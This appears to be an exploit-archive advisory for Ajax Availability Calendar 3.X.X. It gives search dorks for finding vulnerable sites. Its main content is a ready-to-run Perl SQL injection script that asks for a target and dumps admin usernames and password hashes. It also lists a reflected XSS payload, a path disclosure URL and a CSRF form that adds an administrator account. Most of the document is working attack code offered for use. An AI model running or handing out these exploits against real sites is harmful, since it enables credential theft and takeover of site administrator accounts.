Ajax Availability Calendar 3.X.X Multiple Vulnerabilties

2013.05.12
Credit: AtT4CKxT3rR0r1ST
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intitle:\"Ajax Availability Calendar\" , inurl:\"/ac-admin/index.php\"

Ajax Availability Calendar 3.X.X Multiple Vulnerabilties ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://www.ajaxavailabilitycalendar.com/ .:. Dork : intitle:"Ajax Availability Calendar" , inurl:"/ac-admin/index.php" #################################################################### ===[ Exploit ]=== Sql Injection: ============== #!/usr/bin/perl -w # Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability # Author : AtT4CKxT3rR0r1ST # Contact : F.Hack@w.cn # Script : http://www.ajaxavailabilitycalendar.com/ # Admin Panel : www.site.com/ac-admin/ sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } clear(); print "|----------------------------------------------------|\n"; print "| 'Ajax Availability Calendar 3.X.X' |\n"; print "| Coded by : AtT4CKxT3rR0r1ST |\n"; print "|----------------------------------------------------|\n"; use LWP::UserAgent; print "\nInsert Target:"; chomp(my $target=<STDIN>); print "\n[!] Exploiting Progress...\n"; print "\n"; #Nama Column $Column="group_concat(username,0x3a,password)"; #Nama Table $table="bookings_admin_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){ print "\n[+] Admin User : $1\n"; }if($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n"; print "[+] Success !!\n"; } else{print "[-] Unable To Get The Information...\n"; } Reflected XSS: ============== www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script> Full Path Disclosure: ==================== www.site.com/ac-includes/common.inc.php CSRF: ===== [Add Admin] ------------- <form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new"> <input type="hidden" name="add[username]" value="admin"/> <input type="hidden" name="password" value="Palestine"/> <input type="hidden" name="password2" value="Palestine"/> </form> </body> </html> ####################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top